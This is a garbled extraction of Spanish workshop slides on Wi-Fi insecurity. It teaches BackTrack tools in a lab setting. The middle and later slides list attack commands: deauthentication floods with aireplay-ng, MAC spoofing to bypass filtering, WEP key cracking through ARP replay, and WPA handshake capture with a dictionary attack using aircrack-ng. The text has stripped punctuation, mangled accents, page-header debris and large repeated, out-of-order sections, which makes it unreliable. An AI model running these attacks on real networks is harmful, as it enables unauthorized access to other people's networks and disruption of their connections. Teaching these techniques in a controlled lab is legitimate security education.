httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 5: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 594

I- Conceptos de Seguridad

bull Seguridad ldquoGrado de proteccioacuten contra unpeligro dantildeo o peacuterdidardquo (Mike Pastore)

bull Se pretende tener ndash Confidencialidad

ndash Integridad

ndash Disponibilidad

bull Datos en proceso almacenados o en traacutensito

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 694

Riesgo

bull Es cualquier posible evento que pudiera causarun peligro dantildeo o peacuterdida

bull El riesgo no se elimina

ndash

Aceptar el Riesgo ndash Minimizar el Riesgo

ndash Transferir el Riesgo

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 794

Amenaza

bull Causa potencial de un incidente no deseado locual podriacutea resultar en un dantildeo a un sistema u

organizacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 894

Amenazas

Password cracking

Man in the middle

Exploits

Denegacioacuten de servicio

Escalamiento de privilegios

Hacking de Centrales Telefoacutenicas

Keylogging Port scanning

Puertos vulnerables abiertos

Servicios de log inexistentes o que no son revisados

Desactualizacioacuten

Backups inexistentes

Uacuteltimos parches no instalados

Violacioacuten de la privacidad de los empleados

Destruccioacuten de equipamiento

Desastres naturales

Usuarios internos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 994

Maacutes Amenazas

Captura de PC desde el exteriorViolacioacuten de contrasentildeas

Interrupcioacuten de los servicios

VirusMails anoacutenimos con agresiones

Incumplimiento de leyes y regulaciones

Robo o extraviacuteo de notebooks palms

Robo de informacioacuten

Destruccioacuten de soportes documentales

Acceso clandestino a redes

Intercepcioacuten de comunicaciones voz ywireless

Programas ldquobomba troyanosrdquo

Acceso indebido a documentos impresos

Agujeros de seguridad de redes conectadas

Falsificacioacuten de informacioacuten paraterceros

Indisponibilidad de informacioacuten clave

Spamming

Ingenieriacute a social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1094

Vulnerabilidad

bull Error o mala configuracioacuten de Software oHardware que individuos mal intencionadospueden explotar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194

Vulnerabilidad

bull httpwwwsecurityfocuscom

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294

Analogiacutea de Seguridad

Acepto el riesgo

Minimizo el riesgo

Transfiero el riesgo

Amenaza

Vulnerabilidad

Riesgo

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394

Conexioacuten a Medios Alaacutembricos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494

Conexioacuten a Redes inalaacutembricas

bull WiFi (80211x)bull 80211abull 80211bbull

80211gbull 80211n

bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594

ClapgnagmlEncripcioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694

Encripcioacuten

bull Privacidadbull Autenticacioacuten

bull Integridad

bull No repudio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794

Encripcioacuten

bull Encripcioacuten Simeacutetrica

bull Encripcioacuten Asimeacutetrica

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994

II- Armando el Laboratorio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094

Paraacutemetros del laboratorio

bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo

bull Abierto

bull Oculto

bull WEP

bull WPAWPA2

ndash MAC Addressbull 687F7404BE78 (LAN)

bull 687F7404BE7A (WLAN)

ndash Direcciones IPbull WL_AP1 192168165

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 6: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 694

Riesgo

bull Es cualquier posible evento que pudiera causarun peligro dantildeo o peacuterdida

bull El riesgo no se elimina

ndash

Aceptar el Riesgo ndash Minimizar el Riesgo

ndash Transferir el Riesgo

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 794

Amenaza

bull Causa potencial de un incidente no deseado locual podriacutea resultar en un dantildeo a un sistema u

organizacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 894

Amenazas

Password cracking

Man in the middle

Exploits

Denegacioacuten de servicio

Escalamiento de privilegios

Hacking de Centrales Telefoacutenicas

Keylogging Port scanning

Puertos vulnerables abiertos

Servicios de log inexistentes o que no son revisados

Desactualizacioacuten

Backups inexistentes

Uacuteltimos parches no instalados

Violacioacuten de la privacidad de los empleados

Destruccioacuten de equipamiento

Desastres naturales

Usuarios internos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 994

Maacutes Amenazas

Captura de PC desde el exteriorViolacioacuten de contrasentildeas

Interrupcioacuten de los servicios

VirusMails anoacutenimos con agresiones

Incumplimiento de leyes y regulaciones

Robo o extraviacuteo de notebooks palms

Robo de informacioacuten

Destruccioacuten de soportes documentales

Acceso clandestino a redes

Intercepcioacuten de comunicaciones voz ywireless

Programas ldquobomba troyanosrdquo

Acceso indebido a documentos impresos

Agujeros de seguridad de redes conectadas

Falsificacioacuten de informacioacuten paraterceros

Indisponibilidad de informacioacuten clave

Spamming

Ingenieriacute a social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1094

Vulnerabilidad

bull Error o mala configuracioacuten de Software oHardware que individuos mal intencionadospueden explotar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194

Vulnerabilidad

bull httpwwwsecurityfocuscom

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294

Analogiacutea de Seguridad

Acepto el riesgo

Minimizo el riesgo

Transfiero el riesgo

Amenaza

Vulnerabilidad

Riesgo

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394

Conexioacuten a Medios Alaacutembricos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494

Conexioacuten a Redes inalaacutembricas

bull WiFi (80211x)bull 80211abull 80211bbull

80211gbull 80211n

bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594

ClapgnagmlEncripcioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694

Encripcioacuten

bull Privacidadbull Autenticacioacuten

bull Integridad

bull No repudio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794

Encripcioacuten

bull Encripcioacuten Simeacutetrica

bull Encripcioacuten Asimeacutetrica

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994

II- Armando el Laboratorio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094

Paraacutemetros del laboratorio

bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo

bull Abierto

bull Oculto

bull WEP

bull WPAWPA2

ndash MAC Addressbull 687F7404BE78 (LAN)

bull 687F7404BE7A (WLAN)

ndash Direcciones IPbull WL_AP1 192168165

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

